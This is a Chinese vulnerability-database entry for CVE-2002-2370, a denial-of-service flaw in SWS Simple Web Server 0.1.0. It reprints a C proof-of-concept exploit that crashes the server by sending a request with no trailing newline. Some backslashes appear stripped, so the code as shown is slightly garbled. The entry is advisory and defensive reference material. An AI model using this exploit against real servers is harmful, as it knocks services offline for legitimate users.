SWS Simple Web Server处理无换行符请求远程拒绝服务攻击漏洞-安全小百科

SWS Simple Web Server处理无换行符请求远程拒绝服务攻击漏洞

漏洞ID	1106954	漏洞类型	设计错误
发布时间	2002-09-02	更新时间	2002-12-31
CVE编号	CVE-2002-2370	CNNVD-ID	CNNVD-200212-718
漏洞平台	Linux	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/21775
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-718

|漏洞详情

SimpleWebServer是一款小型的WEB服务程序。SimpleWebServer对换行符处理不正确，远程攻击者可以利用这个漏洞进行拒绝服务攻击。SimpleWebServer在处理没有以换行符结尾的请求时可导致服务崩溃，远程攻击者可以利用这个问题进行拒绝服务攻击。

|漏洞EXP

source: http://www.securityfocus.com/bid/5664/info

SWS Simple Web Server is prone to a denial of service when requests not ending with a newline are received.

Remote attackers may exploit this condition to deny access to legitimate users of the web server. 

/*
 * Mon Sep  2 17:45:04 2002
 *
 * |SaMaN| aka Mert <[email protected]>
 *
 * Information  : Anyone can kill SWS Web Server v0.1.0 remotely.
 *
 * Proof of Concept Exploit for SWS Web Server v0.1.0
 *
 * SWS homepage : http://www.linuxprogramlama.com
 *
 * Tested on    : Slackware 8.1 - 2.4.18
 *              : Redhat 7.0    - 2.2.16-22
 *
 * Problem      : sws_web_server.c
 *              : line 108
 *              : if (recvBuffer[i - 1] != 'n') break;
 *
 * Q : So what will happen when we send a string not end with 'n' ?
 * A : break break break
 * Q : So root should restart web server everytime ?
 * A : Yes
 * Q : Other web servers act like this ?
 * A : No
 * Q : So something is wrong ?
 * A : Yes :)
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define K  "33[1;31m"
#define Y  "33[1;32m"
#define SA "33[1;33m"
#define M  "33[1;34m"

#define PORT 80

int main(int argc, char *argv[])
{
   int sockfd, numbytes;
   struct hostent *adres;
   struct sockaddr_in hedef;

   char buf[8] = "|SaMaN|";

   if (argc != 2) {
      printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n", K);
      printf("%sSWS Web Killer ([email protected])  n", SA);
      printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n", K);
      printf("%sUsage: ./sws_web_killer %s<IP>   n",Y,M);
      return 0;
   }

   if ((adres=gethostbyname(argv[1])) == NULL) {
      perror("gethostbyname");
      exit(1);
   }

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
      perror("socket");
      exit(1);
   }

   hedef.sin_family = AF_INET;
   hedef.sin_port = htons(PORT);
   hedef.sin_addr = *((struct in_addr *)adres->h_addr);
   memset(&(hedef.sin_zero), '', 8);

   if (connect(sockfd, (struct sockaddr *)&hedef,
                                     sizeof(struct sockaddr)) == -1)
   {
        perror("connect");
        exit(1);
   }

   if ((numbytes=send(sockfd, buf, strlen(buf), 0)) == -1) {
        perror("send");
        exit(1);
   }

   close(sockfd);

   return 0;
}

|参考资料

来源:BID
名称:5664
链接:http://www.securityfocus.com/bid/5664
来源:XF
名称:sws-webserver-newline-dos(10005)
链接:http://www.iss.net/security_center/static/10005.php
来源:BUGTRAQ
名称:20020902SWSWebServerv0.1.0Exploit
链接:http://archives.neohapsis.com/archives/bugtraq/2002-09/0011.html
来源：NSFOCUS
名称：3464
链接：http://www.nsfocus.net/vulndb/3464

相关推荐: Windows NT CVE-1999-0584 Remote Security Vulnerability

Windows NT CVE-1999-0584 Remote Security Vulnerability 漏洞ID 1208783 漏洞类型 Design Error 发布时间 1999-01-01 更新时间 1999-01-01 CVE编号 CVE-19…

文章版权归作者所有，未经允许请勿转载。

THE END